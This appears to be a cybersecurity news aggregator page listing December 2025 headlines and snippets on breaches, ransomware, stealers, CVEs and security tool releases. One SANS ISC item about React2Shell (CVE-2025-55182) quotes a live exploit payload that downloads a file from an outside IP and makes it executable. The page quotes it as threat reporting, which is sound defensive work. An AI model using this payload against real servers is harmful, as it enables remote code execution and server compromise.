no alarms and no surprises please..
-
Askul confirms theft of 740k customer records in ransomware attack
Askul confirms theft of 740k customer records in ransomware attack Japanese e-commerce giant Askul Corporation has confirmed that RansomHouse hackers stole around 740,000 customer records in the ransomware attack it suffered in October. […] Bill Toulas Go to bleepingcomputer
-
New SantaStealer malware steals data from browsers, crypto wallets
New SantaStealer malware steals data from browsers, crypto wallets A new malware-as-a-service (MaaS) information stealer named SantaStealer is being advertised on Telegram and hacker forums as operating in memory to avoid file-based detection. […] Bill Toulas Go to bleepingcomputer
-
PornHub extorted after hackers steal Premium member activity data
PornHub extorted after hackers steal Premium member activity data Adult video platform PornHub is being extorted by the ShinyHunters extortion gang after the search and watch history of its Premium members was reportedly stolen in a recent Mixpanel data breach. […] Lawrence Abrams Go to bleepingcomputer
-
SoundCloud Confirms Data Breach – Hackers Exfiltrated User Account Data
SoundCloud Confirms Data Breach – Hackers Exfiltrated User Account Data SoundCloud has confirmed a security incident involving unauthorized access to user data, revealing that hackers exfiltrated email addresses and public profile information from approximately 20% of its user base. The company disclosed the breach in a transparency blog post on December 15, 2025, emphasizing that…
-
New GhostPairing Attack Let Attackers Gain Full Access in WhatsApp with Phone Number
New GhostPairing Attack Let Attackers Gain Full Access in WhatsApp with Phone Number A newly discovered account takeover campaign targeting WhatsApp users demonstrates how attackers can compromise messaging accounts without stealing passwords or exploiting technical vulnerabilities. The threat, identified as the GhostPairing Attack, uses social engineering and WhatsApp’s legitimate device linking feature to grant attackers…
-
Critical FortiGate Devices SSO Vulnerabilities Actively Exploited in the Wild
Critical FortiGate Devices SSO Vulnerabilities Actively Exploited in the Wild An active intrusion is targeting critical authentication bypass vulnerabilities in Fortinet’s FortiGate appliances and related products. Threat actors are exploiting CVE-2025-59718 and CVE-2025-59719 to perform unauthenticated single sign-on (SSO) logins via malicious SAML messages, granting attackers administrative access. Fortinet disclosed the flaws in a PSIRT…
-
PornHub Breached by ShinyHunters Group and Premium Members’ Data Stolen
PornHub Breached by ShinyHunters Group and Premium Members’ Data Stolen The notorious hacking collective ShinyHunters has claimed responsibility for a major data breach at Mixpanel, a popular analytics provider, exposing limited user data tied to Pornhub Premium accounts. The incident, which has only affected select Premium subscribers, has raised concerns within the cybersecurity community. Although…
-
ZnDoor Malware Exploiting React2Shell Vulnerability to Compromise Network Devices
ZnDoor Malware Exploiting React2Shell Vulnerability to Compromise Network Devices Since December 2025, a concerning trend has emerged across Japanese organizations as attackers exploit a critical vulnerability in React/Next.js applications. The vulnerability, tracked as CVE-2025-55182 and known as React2Shell, represents a remote code execution flaw attracting widespread exploitation. While initial attacks primarily deployed cryptocurrency miners, security…
-
Google to Shut Down Dark Web Monitoring Tool in February 2026
Google to Shut Down Dark Web Monitoring Tool in February 2026 Google has announced that it’s discontinuing its dark web report tool in February 2026, less than two years after it was launched as a way for users to monitor if their personal information is found on the dark web. To that end, scans for…
-
Featured Chrome Browser Extension Caught Intercepting Millions of Users’ AI Chats
Featured Chrome Browser Extension Caught Intercepting Millions of Users’ AI Chats A Google Chrome extension with a “Featured” badge and six million users has been observed silently gathering every prompt entered by users into artificial intelligence (AI)-powered chatbots like OpenAI ChatGPT, Anthropic Claude, Microsoft Copilot, DeepSeek, Google Gemini, xAI Grok, Meta AI, and Perplexity. The…
-
FreePBX Patches Critical SQLi, File-Upload, and AUTHTYPE Bypass Flaws Enabling RCE
FreePBX Patches Critical SQLi, File-Upload, and AUTHTYPE Bypass Flaws Enabling RCE Multiple security vulnerabilities have been disclosed in the open-source private branch exchange (PBX) platform FreePBX, including a critical flaw that could result in an authentication bypass under certain configurations. The shortcomings, discovered by Horizon3.ai and reported to the project maintainers on September 15, 2025,…
-
⚡ Weekly Recap: Apple 0-Days, WinRAR Exploit, LastPass Fines, .NET RCE, OAuth Scams & More
⚡ Weekly Recap: Apple 0-Days, WinRAR Exploit, LastPass Fines, .NET RCE, OAuth Scams & More If you use a smartphone, browse the web, or unzip files on your computer, you are in the crosshairs this week. Hackers are currently exploiting critical flaws in the daily software we all rely on—and in some cases, they started…
-
A Browser Extension Risk Guide After the ShadyPanda Campaign
A Browser Extension Risk Guide After the ShadyPanda Campaign In early December 2025, security researchers exposed a cybercrime campaign that had quietly hijacked popular Chrome and Edge browser extensions on a massive scale. A threat group dubbed ShadyPanda spent seven years playing the long game, publishing or acquiring harmless extensions, letting them run clean for…
-
Game of clones: Sophos and the MITRE ATT&CK Enterprise 2025 Evaluations
Game of clones: Sophos and the MITRE ATT&CK Enterprise 2025 Evaluations Winter is coming – so it must be time for Sophos X-Ops’ report on this year’s MITRE ATT&CK Enterprise Evaluations Matt Wixey Go to sophos
-
Against the Federal Moratorium on State-Level Regulation of AI
Against the Federal Moratorium on State-Level Regulation of AI Cast your mind back to May of this year: Congress was in the throes of debate over the massive budget bill. Amidst the many seismic provisions, Senator Ted Cruz dropped a ticking time bomb of tech policy: a ten-year moratorium on the ability of states to…
-
ISC Stormcast For Tuesday, December 16th, 2025 https://isc.sans.edu/podcastdetail/9740, (Tue, Dec 16th)
ISC Stormcast For Tuesday, December 16th, 2025 https://isc.sans.edu/podcastdetail/9740, (Tue, Dec 16th) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Go to isc.sans.edu
-
More React2Shell Exploits CVE-2025-55182, (Mon, Dec 15th)
More React2Shell Exploits CVE-2025-55182, (Mon, Dec 15th) Exploits for React2Shell (CVE-2025-55182) remain active. However, at this point, I would think that any servers vulnerable to the “plain” exploit attempts have already been exploited several times. Here is today’s most popular exploit payload: ——WebKitFormBoundaryxtherespoopalloverme Content-Disposition: form-data; name=”0″ {“then”:”$1:__proto__:then”,”status”:”resolved_model”,”reason”:-1,”value”:”{“then”:”$B1337″}”,”_response”:{“_prefix”:”process.mainModule.require(‘http’).get(‘http://51.81.104.115/nuts/poop’,r=>r.pipe(process.mainModule.require(‘fs’).createWriteStream(‘/dev/shm/lrt’).on(‘finish’,()=>process.mainModule.require(‘fs’).chmodSync(‘/dev/shm/lrt’,0o755))));”,”_formData”:{“get”:”$1:constructor:constructor”}}} ——WebKitFormBoundaryxtherespoopalloverme Content-Disposition: form-data; name=”1″ “$@0” ——WebKitFormBoundaryxtherespoopalloverme ——WebKitFormBoundaryxtherespoopalloverme– To…
-
How Cyber Insurance MGAs Shape Policies for Evolving Cyber Risks
How Cyber Insurance MGAs Shape Policies for Evolving Cyber Risks Managing general agents help insurers navigate sectors where they lack expertise. A cybersecurity policy written by an MGA is more likely to reflect an understanding of the risks CISOs deal with. Ericka Chickowski, Contributing Writer Go to gbhackers.com
-
Apple Patches More Zero-Days Used in ‘Sophisticated’ Attack
Apple Patches More Zero-Days Used in ‘Sophisticated’ Attack Two Apple zero-day vulnerabilities discovered this month have overlap with another mysterious zero-day flaw Google patched last week. Alexander Culafi Go to gbhackers.com
-
Think Like an Attacker: Cybersecurity Tips From Cato Networks’ CISO
Think Like an Attacker: Cybersecurity Tips From Cato Networks’ CISO Etay Mayor, a cybersecurity strategist and professor, shares his journey, insights, and advice on breaking into the diverse and ever-evolving field of cybersecurity. Kristina Beek Go to gbhackers.com
-
Flaw in Hacktivist Ransomware Lets Victims Decrypt Own Files
Flaw in Hacktivist Ransomware Lets Victims Decrypt Own Files A new version of VolkLocker, wielded by the pro-Russia RaaS group CyberVolk, has some key enhancements but one fatal flaw. Elizabeth Montalbano, Contributing Writer Go to gbhackers.com
-
Storm-0249: EDR Process Sideloading to Conceal Malicious Activity
Storm-0249: EDR Process Sideloading to Conceal Malicious Activity Initial access broker Storm-0249 has evolved from a mass phishing operation into a sophisticated threat actor weaponizing legitimate Endpoint Detection and Response (EDR) processes… Go to gbhackers.com
-
New VolkLocker Ransomware Variant Targets Both Linux and Windows Systems
New VolkLocker Ransomware Variant Targets Both Linux and Windows Systems CyberVolk, a pro-Russia hacktivist group first documented in late 2024, has resurfaced with a sophisticated ransomware-as-a-service (RaaS) offering called VolkLocker after months of dormancy… Go to gbhackers.com
-
NVIDIA Merlin Vulnerabilities Allow Malicious Code Execution and DoS Attacks
NVIDIA Merlin Vulnerabilities Allow Malicious Code Execution and DoS Attacks NVIDIA has released urgent security patches for its Merlin machine learning framework after discovering two high-severity deserialization vulnerabilities that could enable attackers to execute… Go to gbhackers.com
-
Critical Plesk Vulnerability Allows Users to Gain Root-Level Access
Critical Plesk Vulnerability Allows Users to Gain Root-Level Access A critical security vulnerability has been discovered in Plesk, a widely used web hosting control panel, that enables unauthorised users to escalate privileges and… Go to gbhackers.com
-
Critical pgAdmin Flaw Allows Attackers to Execute Shell Commands on Host
Critical pgAdmin Flaw Allows Attackers to Execute Shell Commands on Host A new critical vulnerability in pgAdmin 4 allows remote attackers to bypass security filters and execute arbitrary shell commands on the host server. The… Go to gbhackers.com
-
Microsoft: December security updates cause Message Queuing failures
Microsoft: December security updates cause Message Queuing failures Microsoft has confirmed that the December 2025 security updates are breaking Message Queuing (MSMQ) functionality, affecting enterprise applications and Internet Information Services (IIS) websites. […] Sergiu Gatlan Go to bleepingcomputer
-
Beware: PayPal subscriptions abused to send fake purchase emails
Beware: PayPal subscriptions abused to send fake purchase emails An email scam is abusing PayPal’s “Subscriptions” billing feature to send legitimate PayPal emails that contain fake purchase notifications embedded in the Customer service URL field. […] Lawrence Abrams Go to bleepingcomputer
-
CyberVolk’s ransomware debut stumbles on cryptography weakness
CyberVolk’s ransomware debut stumbles on cryptography weakness The pro-Russia hacktivist group CyberVolk launched a ransomware-as-a-service (RaaS) called VolkLocker that suffered from serious implementation flaws, allowing victims to potentially decrypt files for free. […] Bill Toulas Go to bleepingcomputer
-
Windows Remote Access Connection Manager Vulnerability Enables Arbitrary Code Execution
Windows Remote Access Connection Manager Vulnerability Enables Arbitrary Code Execution A critical security issue involving the Windows Remote Access Connection Manager (RasMan) allows local attackers to execute arbitrary code with System privileges. While investigating CVE-2025-59230, the vulnerability that Microsoft addressed in the October 2025 security updates, 0patch security analysts discovered a complex exploit chain that…
-
CISA Adds Sierra Router Vulnerability to KEV Catalogue Following Active Exploitation
CISA Adds Sierra Router Vulnerability to KEV Catalogue Following Active Exploitation A critical vulnerability affecting Sierra Wireless routers has been added to CISA’s Known Exploited Vulnerabilities (KEV) catalog. This decision comes after evidence emerged that the flaw is being actively exploited in the wild, posing significant risks to organizations that still utilize these legacy devices.…
-
CISA Releases Guidance for Managing UEFI Secure Boot on Enterprise Devices
CISA Releases Guidance for Managing UEFI Secure Boot on Enterprise Devices The U.S. Cybersecurity and Infrastructure Security Agency (CISA), in coordination with the National Security Agency (NSA), has issued new guidance urging enterprises to verify and manage UEFI Secure Boot configurations to counter bootkit threats. Released in December 2025 as a Cybersecurity Information Sheet (CSI),…
-
CISA Warns of Windows Cloud Files Mini Filter 0-Day Vulnerability Exploited in Attacks
CISA Warns of Windows Cloud Files Mini Filter 0-Day Vulnerability Exploited in Attacks CISA has issued a critical alert regarding an active zero-day vulnerability affecting the Microsoft Windows Cloud Files Mini Filter Driver. The vulnerability poses a significant risk to organizations running affected Windows systems and requires immediate remediation efforts. CISA reports that the vulnerability, tracked as CVE-2025-62221,…
-
TR-25-0456 (Google Android Security Notice)
TR-25-0456 (Google Android Security Notice) Go to usom.gov
-
TR-25-0455 (Apache Security Notice)
TR-25-0455 (Apache Security Notice) Go to usom.gov
-
TR-25-0454 (Dormakaba Security Notice)
TR-25-0454 (Dormakaba Security Notice) Go to usom.gov
-
TR-25-0453 (Typora Security Notice)
TR-25-0453 (Typora Security Notice) Go to usom.gov
-
TR-25-0452 (Tenda Security Vulnerability)
TR-25-0452 (Tenda Security Vulnerability) Go to usom.gov
-
VolkLocker Ransomware Exposed by Hard-Coded Master Key Allowing Free Decryption
VolkLocker Ransomware Exposed by Hard-Coded Master Key Allowing Free Decryption The pro-Russian hacktivist group known as CyberVolk (aka GLORIAMIST) has resurfaced with a new ransomware-as-a-service (RaaS) offering called VolkLocker that suffers from implementation lapses in test artifacts, allowing users to decrypt files without paying an extortion fee. According to SentinelOne, VolkLocker (aka CyberVolk 2.x) emerged…
-
Upcoming Speaking Engagements
Upcoming Speaking Engagements This is a current list of where and when I am scheduled to speak: I’m speaking and signing books at the Chicago Public Library in Chicago, Illinois, USA, at 6:00 PM CT on February 5, 2026. Details to come. I’m speaking at Capricon 44 in Chicago, Illinois, USA. The convention runs February…
-
ISC Stormcast For Monday, December 15th, 2025 https://isc.sans.edu/podcastdetail/9738, (Mon, Dec 15th)
ISC Stormcast For Monday, December 15th, 2025 https://isc.sans.edu/podcastdetail/9738, (Mon, Dec 15th) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Go to isc.sans.edu
-
Wireshark 4.6.2 Released, (Sun, Dec 14th)
Wireshark 4.6.2 Released, (Sun, Dec 14th) Wireshark release 4.6.2 fixes 2 vulnerabilities and 5 bugs. The Windows installers now ship with the Visual C++ Redistributable version 14.44.35112. This required a reboot of my laptop. Didier Stevens Senior handler blog.DidierStevens.com (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Go to isc.sans.edu
-
Researchers and Developers Targeted in AI-Driven GitHub Supply Chain Attack
Researchers and Developers Targeted in AI-Driven GitHub Supply Chain Attack A sophisticated AI-generated supply chain attack is targeting researchers, developers, and security professionals through compromised GitHub repositories, according to findings from Morphisec Threat Labs…. Go to gbhackers.com
-
Empire 6.3.0 Released as Updated Post-Exploitation Framework for Red Teams
Empire 6.3.0 Released as Updated Post-Exploitation Framework for Red Teams Researchers have officially released Empire 6.3.0, a significant update to the widely used post-exploitation and adversary emulation framework designed for Red Teams and Penetration Testers. This latest… Go to gbhackers.com
-
Apple Confirms Zero-Day Exploitation in Targeted Attacks on iPhone Users
Apple Confirms Zero-Day Exploitation in Targeted Attacks on iPhone Users Apple has issued critical security patches addressing two actively exploited zero-day vulnerabilities affecting iPhone and iPad devices. The tech giant confirmed that both flaws… Go to gbhackers.com
-
Kali Linux 2025.4 Released Featuring 3 New Hacking Tools and Wifipumpkin3
Kali Linux 2025.4 Released Featuring 3 New Hacking Tools and Wifipumpkin3 The release of Kali Linux 2025.4 marks a significant milestone for the ethical hacking distribution, bringing major architectural changes and a suite of fresh tools. This… Go to gbhackers.com
-
Hackers Launch Rust-Based Luca Stealer Targeting Linux and Windows
Hackers Launch Rust-Based Luca Stealer Targeting Linux and Windows Cybercriminals are increasingly abandoning traditional programming languages like C and C++ in favor of modern alternatives such as Rust, Golang, and Nim. This strategic… Go to gbhackers.com
-
Google Warns Multiple Hacker Groups Are Exploiting React2Shell to Spread Malware
Google Warns Multiple Hacker Groups Are Exploiting React2Shell to Spread Malware Google Threat Intelligence Group (GTIG) has issued a warning regarding the widespread exploitation of a critical security flaw in React Server Components. Known as React2Shell (CVE-2025-55182), this vulnerability allows attackers to take control of servers remotely without needing a password. Since the vulnerability was disclosed…
-
Empire 6.3.0 Launches With New Features for Red Teams and Penetration Testers
Empire 6.3.0 Launches With New Features for Red Teams and Penetration Testers BC Security has announced the release of Empire 6.3.0, the latest iteration of the widely used post-exploitation and adversary emulation framework. This update reinforces Empire’s position as a premier tool for Red Teams and penetration testers, offering a flexible, modular server architecture written in…
-
CISA Warns of Google Chromium 0-Day Vulnerability Exploited in Attacks
CISA Warns of Google Chromium 0-Day Vulnerability Exploited in Attacks The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical zero-day vulnerability in Google Chromium’s ANGLE graphics engine to its Known Exploited Vulnerabilities (KEV) catalog. Tracked as CVE-2025-14174, the flaw allows remote attackers to trigger out-of-bounds memory access via a malicious HTML page,…
-
Black Hat Europe 2025: Was that device designed to be on the internet at all?
Black Hat Europe 2025: Was that device designed to be on the internet at all? Behind the polished exterior of many modern buildings sit outdated systems with vulnerabilities waiting to be found Go to eset
-
CISA Adds Actively Exploited Sierra Wireless Router Flaw Enabling RCE Attacks
CISA Adds Actively Exploited Sierra Wireless Router Flaw Enabling RCE Attacks The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a high-severity flaw impacting Sierra Wireless AirLink ALEOS routers to its Known Exploited Vulnerabilities (KEV) catalog, following reports of active exploitation in the wild. CVE-2018-4063 (CVSS score: 8.8/9.9) refers to an unrestricted file…
-
ClickFix Attacks Still Using the Finger, (Sat, Dec 13th)
ClickFix Attacks Still Using the Finger, (Sat, Dec 13th) Introduction Since as early as November 2025, the finger protocol has been used in ClickFix social engineering attacks. BleepingComputer posted a report of this activity on November 15th, and Didier Stevens posted a short follow-up in an ISC diary the next day. I often investigate two…
-
Gartner tells businesses to block AI browsers now
Gartner tells businesses to block AI browsers now Analyst firm Gartner has issued a blunt warning to organizations: Agentic AI browsers introduce serious new security risks and should be blocked “for the foreseeable future.” Read more in my article on the Fortra blog. Graham Cluley Go to grahamcluley
-
Hackers Target Windows Systems Using Phantom Stealer Hidden in ISO Files
Hackers Target Windows Systems Using Phantom Stealer Hidden in ISO Files Seqrite Labs has uncovered an active Russian phishing campaign that delivers Phantom information-stealing malware through malicious ISO files embedded in fake payment confirmation emails…. Go to gbhackers.com
-
New JSCEAL Infostealer Malware Targets Windows Systems to Steal Login Credentials
New JSCEAL Infostealer Malware Targets Windows Systems to Steal Login Credentials A sophisticated information-stealing tool known as JSCEAL has evolved significantly in recent months, deploying advanced anti-analysis techniques and hardened command-and-control infrastructure to target users… Go to gbhackers.com
-
MITRE Unveils 2025’s Top 25 Most Dangerous Software Weaknesses
MITRE Unveils 2025’s Top 25 Most Dangerous Software Weaknesses MITRE has released its annual Common Weakness Enumeration (CWE) Top 25 Most Dangerous Software Weaknesses list for 2025, identifying the most critical vulnerabilities affecting software development… Go to gbhackers.com
-
Research Findings on the Fate of Data Stolen in Phishing Attacks
Research Findings on the Fate of Data Stolen in Phishing Attacks New research from Kaspersky has mapped the complete lifecycle of data stolen during phishing attacks, revealing a sophisticated “shadow market conveyor belt” where victim… Go to gbhackers.com
-
CISA Issues New Guidance for Securing UEFI Secure Boot on Enterprise Devices
CISA Issues New Guidance for Securing UEFI Secure Boot on Enterprise Devices The Cybersecurity and Infrastructure Security Agency has released critical guidance on managing UEFI Secure Boot configurations across enterprise systems. The comprehensive advisory addresses growing… Go to gbhackers.com
-
Apple fixes two zero-day flaws exploited in ‘sophisticated’ attacks
Apple fixes two zero-day flaws exploited in ‘sophisticated’ attacks Apple has released emergency updates to patch two zero-day vulnerabilities that were exploited in an “extremely sophisticated attack” targeting specific individuals. […] Lawrence Abrams Go to bleepingcomputer
-
Coupang data breach traced to ex-employee who retained system access
Coupang data breach traced to ex-employee who retained system access A data breach at Coupang that exposed the information of 33.7 million customers has been tied to a former employee who retained access to internal systems after leaving the company. […] Bill Toulas Go to bleepingcomputer
-
Fake ‘One Battle After Another’ torrent hides malware in subtitles
Fake ‘One Battle After Another’ torrent hides malware in subtitles A fake torrent for Leonardo DiCaprio’s ‘One Battle After Another’ hides malicious PowerShell malware loaders inside subtitle files that ultimately infect devices with the Agent Tesla RAT malware. […] Bill Toulas Go to bleepingcomputer
-
Kali Linux 2025.4 released with 3 new tools, desktop updates
Kali Linux 2025.4 released with 3 new tools, desktop updates Kali Linux has released version 2025.4, its final update of the year, introducing three new hacking tools, desktop environment improvements, the preview of Wifipumpkin3 in NetHunter, and enhanced Wayland support. […] Lawrence Abrams Go to bleepingcomputer
-
Shadow spreadsheets: The security gap your tools can’t see
Shadow spreadsheets: The security gap your tools can’t see When official systems can’t support everyday workflows, employees turn to spreadsheets — creating “shadow spreadsheets” that circulate unchecked. Grist shows how these spreadsheets expose sensitive data, create version sprawl, and remove the audit trails security teams depend on. […] Sponsored by Grist Go to bleepingcomputer
-
Rust-Based Luca Stealer Spreads Across Linux and Windows Systems
Rust-Based Luca Stealer Spreads Across Linux and Windows Systems Threat actors are increasingly abandoning traditional languages like C and C++ in favor of modern alternatives such as Golang, Rust, and Nim. This strategic shift enables developers to compile malicious code for both Linux and Windows with minimal modifications. Among the emerging threats in this landscape…
-
New Phantom Stealer Campaign Hits Windows Machines Through ISO Mounting
New Phantom Stealer Campaign Hits Windows Machines Through ISO Mounting Researchers have uncovered a sophisticated phishing campaign originating in Russia that deploys the Phantom information-stealing malware via malicious ISO files. The attack, dubbed “Operation MoneyMount-ISO,” targets finance and accounting departments explicitly using fake payment confirmation emails to trick victims into executing the payload. The campaign…
-
Apple 0-Day Vulnerabilities Exploited in Sophisticated Attacks Targeting iPhone Users
Apple 0-Day Vulnerabilities Exploited in Sophisticated Attacks Targeting iPhone Users Apple patches two WebKit zero-day flaws actively exploited in sophisticated attacks targeting specific iPhone users running iOS versions prior to 26. The iOS 26.2 and iPadOS 26.2 updates, released December 12, 2025, address CVE-2025-43529 and CVE-2025-14174 in WebKit. CVE-2025-43529 involves a use-after-free vulnerability enabling arbitrary…
-
Kali Linux 2025.4 Released With 3 New Hacking Tools and Wifipumpkin3
Kali Linux 2025.4 Released With 3 New Hacking Tools and Wifipumpkin3 Kali Linux 2025.4 has been released with substantial desktop environment improvements, full Wayland support across virtual machines, and three powerful new hacking tools, including the much-anticipated Wifipumpkin3. Released on December 12, 2025, this update focuses on modernizing the user experience while maintaining Kali’s position as the…
-
Critical React2Shell Vulnerability (CVE-2025-55182) Analysis: Surge in Attacks Targeting RSC-Enabled Services Worldwide
Critical React2Shell Vulnerability (CVE-2025-55182) Analysis: Surge in Attacks Targeting RSC-Enabled Services Worldwide Torrance, United States / California, December 12th, 2025, CyberNewsWire In December 2025, CVE-2025-55182 (React2Shell), a vulnerability in React Server Components (RSC) that enables remote code execution (RCE), was publicly disclosed. Shortly after publication, multiple security vendors reported scanning activity and suspected exploitation attempts,…
-
Black Hat Europe 2025: Reputation matters – even in the ransomware economy
Black Hat Europe 2025: Reputation matters – even in the ransomware economy Being seen as reliable is good for ‘business’ and ransomware groups care about ‘brand reputation’ just as much as their victims Go to eset
-
Locks, SOCs and a cat in a box: What Schrödinger can teach us about cybersecurity
Locks, SOCs and a cat in a box: What Schrödinger can teach us about cybersecurity If you don’t look inside your environment, you can’t know its true state – and attackers count on that Go to eset
-
TR-25-0450 (Nebim Neyir Bilgisayar – Nebim V3 ERP Security Notice)
TR-25-0450 (Nebim Neyir Bilgisayar – Nebim V3 ERP Security Notice) Go to usom.gov
-
Apple Issues Security Updates After Two WebKit Flaws Found Exploited in the Wild
Apple Issues Security Updates After Two WebKit Flaws Found Exploited in the Wild Apple on Friday released security updates for iOS, iPadOS, macOS, tvOS, watchOS, visionOS, and its Safari web browser to address two security flaws that it said have been exploited in the wild, one of which is the same flaw that was patched…
-
Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads
Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads Cybersecurity researchers are calling attention to a new campaign that’s leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT. “These repositories, often themed as development utilities or OSINT tools, contain only a few lines of code responsible…
-
New Advanced Phishing Kits Use AI and MFA Bypass Tactics to Steal Credentials at Scale
New Advanced Phishing Kits Use AI and MFA Bypass Tactics to Steal Credentials at Scale Cybersecurity researchers have documented four new phishing kits named BlackForce, GhostFrame, InboxPrime AI, and Spiderman that are capable of facilitating credential theft at scale. BlackForce, first detected in August 2025, is designed to steal credentials and perform Man-in-the-Browser (MitB) attacks…
-
Securing GenAI in the Browser: Policy, Isolation, and Data Controls That Actually Work
Securing GenAI in the Browser: Policy, Isolation, and Data Controls That Actually Work The browser has become the main interface to GenAI for most enterprises: from web-based LLMs and copilots, to GenAI‑powered extensions and agentic browsers like ChatGPT Atlas. Employees are leveraging the power of GenAI to draft emails, summarize documents, work on code, and…
-
New React RSC Vulnerabilities Enable DoS and Source Code Exposure
New React RSC Vulnerabilities Enable DoS and Source Code Exposure The React team has released fixes for two new types of flaws in React Server Components (RSC) that, if successfully exploited, could result in denial-of-service (DoS) or source code exposure. The team said the issues were found by the security community while attempting to exploit…
-
Friday Squid Blogging: Giant Squid Eating a Diamondback Squid
Friday Squid Blogging: Giant Squid Eating a Diamondback Squid I have no context for this video—it’s from Reddit—but one of the commenters adds some context: Hey everyone, squid biologist here! Wanted to add some stuff you might find interesting. With so many people carrying around cameras, we’re getting more videos of giant squid at the…
-
Building Trustworthy AI Agents
Building Trustworthy AI Agents The promise of personal AI assistants rests on a dangerous assumption: that we can trust systems we haven’t made trustworthy. We can’t. And today’s versions are failing us in predictable ways: pushing us to do things against our own best interests, gaslighting us with doubt about things we are or that…
-
Abusing DLLs EntryPoint for the Fun, (Fri, Dec 12th)
Abusing DLLs EntryPoint for the Fun, (Fri, Dec 12th) In the Microsoft Windows ecosystem, DLLs (Dynamic Load Libraries) are PE files like regular programs. One of the main differences is that they export functions that can be called by programs that load them. For example, to call RegOpenKeyExA(), the program must first load ADVAPI32.dll.…
-
Processing 630 Million More Pwned Passwords, Courtesy of the FBI
Processing 630 Million More Pwned Passwords, Courtesy of the FBI The sheer scope of cybercrime can be hard to fathom, even when you live and breathe it every day. It’s not just the volume of data, but also the extent to which it replicates across criminal actors seeking to abuse it for their own gain,…
-
The CISO-COO Partnership: Protecting Operational Excellence
The CISO-COO Partnership: Protecting Operational Excellence Digital transformation has made cybersecurity preparation part of operational resilience for most organizations. This calls for a new relationship between CISO and COO. George V. Hulme, Contributing Writer Go to gbhackers.com
-
React2Shell Exploits Flood the Internet as Attacks Continue
React2Shell Exploits Flood the Internet as Attacks Continue As exploitation activity against CVE-2025-55182 continues, researchers are finding that some proof-of-concept exploits contain bypasses for Web application firewall (WAF) rules. Rob Wright Go to gbhackers.com
-
Vibe Coding: Innovation Demands Vigilance
Vibe Coding: Innovation Demands Vigilance Unmanaged coding is indeed an alluring idea, but can introduce a host of significant cybersecurity dangers, Constantine warns. Chrissa Constantine Go to gbhackers.com
-
Microsoft Will Bundle Security Copilot with M365 Enterprise Licenses
Microsoft Will Bundle Security Copilot with M365 Enterprise Licenses The move aims to expand the use of Security Copilot and comes with the launch of 12 new agents from Microsoft at the company’s Ignite conference last week. Jeffrey Schwartz Go to gbhackers.com
-
Supply Chain Attacks Targeting GitHub Actions Increased in 2025
Supply Chain Attacks Targeting GitHub Actions Increased in 2025 At this week’s Black Hat Europe conference, two researchers urged developers to adopt a shared responsibility model for open source software and not leave it all up to GitHub to handle. Jeffrey Schwartz Go to gbhackers.com
-
Are Trade Concerns Trumping US Cybersecurity?
Are Trade Concerns Trumping US Cybersecurity? The Trump administration appears to have dropped sanctions against Chinese actors for the Salt Typhoon attacks on US telecoms, but focusing on diplomacy alone misses the full picture, experts say. Robert Lemos, Contributing Writer Go to gbhackers.com
-
CISA orders feds to patch actively exploited Geoserver flaw
CISA orders feds to patch actively exploited Geoserver flaw CISA has ordered U.S. federal agencies to patch a critical GeoServer vulnerability now actively exploited in XML External Entity (XXE) injection attacks. […] Sergiu Gatlan Go to bleepingcomputer
-
MITRE shares 2025’s top 25 most dangerous software weaknesses
MITRE shares 2025’s top 25 most dangerous software weaknesses MITRE has shared this year’s top 25 list of the most dangerous software weaknesses behind over 39,000 security vulnerabilities disclosed between June 2024 and June 2025. […] Sergiu Gatlan Go to bleepingcomputer
-
MKVCinemas streaming piracy service with 142M visits shuts down
MKVCinemas streaming piracy service with 142M visits shuts down An anti-piracy coalition has dismantled one of India’s most popular streaming piracy services, which has provided free access to movies and TV shows to millions over the past two years. […] Sergiu Gatlan Go to bleepingcomputer
-
Brave browser starts testing agentic AI mode for automated tasks
Brave browser starts testing agentic AI mode for automated tasks Brave has introduced a new AI browsing feature that leverages Leo, its privacy-respecting AI assistant, to perform automated tasks for the user. […] Bill Toulas Go to bleepingcomputer
-
Hackers exploit Gladinet CentreStack cryptographic flaw in RCE attacks
Hackers exploit Gladinet CentreStack cryptographic flaw in RCE attacks Hackers are exploiting a new, undocumented vulnerability in the implementation of the cryptographic algorithm present in Gladinet’s CentreStack and Triofox products for secure remote file access and sharing. […] Bill Toulas Go to bleepingcomputer
-
Ashen Lepus Hacker Group Attacks Eastern Diplomatic Entities With New AshTag Malware
Ashen Lepus Hacker Group Attacks Eastern Diplomatic Entities With New AshTag Malware A Hamas‑affiliated threat group known as Ashen Lepus, also tracked as WIRTE, has launched a new espionage campaign against governmental and diplomatic entities across the Middle East. The group uses realistic Arabic‑language diplomatic lures that reference regional politics and security talks to trick…
-
Apache Struts 2 DoS Vulnerability Let Attackers Crash Server
Apache Struts 2 DoS Vulnerability Let Attackers Crash Server A critical denial-of-service vulnerability has been discovered in Apache Struts 2, affecting multiple versions of the popular web application framework. The vulnerability, identified as CVE-2025-64775, exploits a file leak in multipart request processing that can cause disk exhaustion and server crashes. Organizations running affected versions should…
-
Windows Remote Access Connection Manager Vulnerabilities Let Attackers Escalate Privileges
Windows Remote Access Connection Manager Vulnerabilities Let Attackers Escalate Privileges Two critical privilege escalation flaws were disclosed in the Windows Remote Access Connection Manager on December 9, 2025. The vulnerabilities, tracked as CVE-2025-62472 and CVE-2025-62474, allow authorized attackers with low-level privileges to gain SYSTEM-level access on affected systems. CVE-2025-62472 stems from the use of uninitialized…
-
CISA Warns of OSGeo GeoServer 0-Day Vulnerability Exploited in Attacks
CISA Warns of OSGeo GeoServer 0-Day Vulnerability Exploited in Attacks CISA has issued an urgent warning about a critical security flaw in OSGeo GeoServer, a widely used open-source geographic data-sharing server. CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, indicating that threat actors are actively leveraging this zero-day flaw in attacks targeting both public…
-
New Vulnerabilities in React Server Components Allow DoS Attacks and Source Code Leaks
